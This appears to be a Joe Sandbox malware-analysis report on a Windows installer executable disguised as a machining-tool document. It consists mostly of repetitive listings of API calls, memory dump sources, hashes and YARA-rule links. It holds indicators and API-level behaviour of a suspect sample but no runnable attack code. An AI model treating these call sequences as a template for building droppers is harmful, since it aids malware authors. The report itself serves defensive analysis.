                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1096422788-0
                                                                                                                                                                                                                          • Opcode ID: 3f00b4a3684e1b502d57278d27361b2c9c5ffa269ab71a706c43388532d59aa2
                                                                                                                                                                                                                          • Instruction ID: 0f0d0afc6be0f3d5bf6976507d7aeec6b8dca919a9a5ba2fd125b200ef34e9dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f00b4a3684e1b502d57278d27361b2c9c5ffa269ab71a706c43388532d59aa2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB889419B1D
                                                                                                                                                                                                                          Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                                                                                                                                                                                          • Instruction ID: c0e7c3dc5a7dcdb4abcf1ae6b2c94b9daad9c86c1f50bd1ad5aacfe77fb55035
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D01D77B14100ABDB10DBA49B0895D77A5A750315B304677D201F11D0D679C5559619
                                                                                                                                                                                                                          Function 00403F2E Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                                                                                                                                                                                          • Instruction ID: a59996f4b7e9e068504c33c606b0867cc0e460aa155bd5cdf8ba5dd419a24ee0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36C04C71B482017ADA21CF509D49F0777696750B41F5544657220E50E0C6B4E450E62D
                                                                                                                                                                                                                          Function 00403F17 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                                                                                                                                                                                          • Instruction ID: 65dbcc2540e3052566e14dce8ba9d4df8b534898b5f9aa1fd4013fdf277ded57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B092B6684200BADE228B00DD09F467AB2E7A8742F008024B200640B0CAB200A1DB19
                                                                                                                                                                                                                          Function 00403091 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                                                                                                          • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                                                                                                                                                                                          Function 00403F04 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403CE1), ref: 00403F0E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                                                                                                                                                                                          • Instruction ID: 7637a56702c009cdf6d2df62dbdf6ab1f46e74dd5bb36fdb1abe1d05dca4f055
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EA002754085009BDB125B50FE089557A71B754701721C475B15551075C7315425EB59
                                                                                                                                                                                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 8387a69485fb85be3a7c5f05262e913179e5fc796a1b156d0618e7b44dcf4754
                                                                                                                                                                                                                          • Instruction ID: b5296e666e3eb9f388ca1958c901a8d829edbdeddb054b2b363218320e2a312e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8387a69485fb85be3a7c5f05262e913179e5fc796a1b156d0618e7b44dcf4754
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D0C777B145009BD750E7B87E8545A63A9F7513253204933D502F1091D578C9068A69

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00404893 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                                                                                                                                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404913
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404968
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404974
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404986
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404989
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049C0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A55
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A94
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C44
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C59
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C7D
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C9D
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404CB2
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00404CC2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D3B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DF3
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00404E13
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404E73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          • Opcode ID: a0a371d3bc0d37eaac2b0494861fa113579f48f053280849895514ceddcaca5b
                                                                                                                                                                                                                          • Instruction ID: c4f70692a945eeac8c46a5cc4d62b09966a4cf856849f89cf4e80ba5cf8d6073
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a371d3bc0d37eaac2b0494861fa113579f48f053280849895514ceddcaca5b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D0250B0A00209AFDB10DF54DC85AAE7BB5FB84315F10817AF611B62E1C7789D42CF58
                                                                                                                                                                                                                          Function 00404320 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(Call,Hil Setup: Installing), ref: 00404487
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404493
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                                                                                                                                                                                            • Part of subcall function 004054D7: GetDlgItemTextA.USER32(?,?,00000400,004044DC), ref: 004054EA
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,?,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457E
                                                                                                                                                                                                                            • Part of subcall function 004046D7: lstrlenA.KERNEL32(Hil Setup: Installing,Hil Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                            • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                            • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,Hil Setup: Installing), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: A$C:\Users\user\falden\myotonias\nonvoting$Call$Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 2624150263-2511203788
                                                                                                                                                                                                                          • Opcode ID: 0d3185227b72b593b0c9c2600799bd3f9534f23045c6af8c35ec4ed3e8376118
                                                                                                                                                                                                                          • Instruction ID: 52af94dd87b45bde8ff603abcb7252099f64fe51c68325ad3ba2cad582a3dd3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d3185227b72b593b0c9c2600799bd3f9534f23045c6af8c35ec4ed3e8376118
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8A18DB1900209ABDB11AFA5DC45BEFB6B8EF84314F14843BF611B62D1D77C8A418B69
                                                                                                                                                                                                                          Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004073C0,?,?,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs, xrefs: 0040211D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                          • String ID: C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs
                                                                                                                                                                                                                          • API String ID: 123533781-893828937
                                                                                                                                                                                                                          • Opcode ID: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
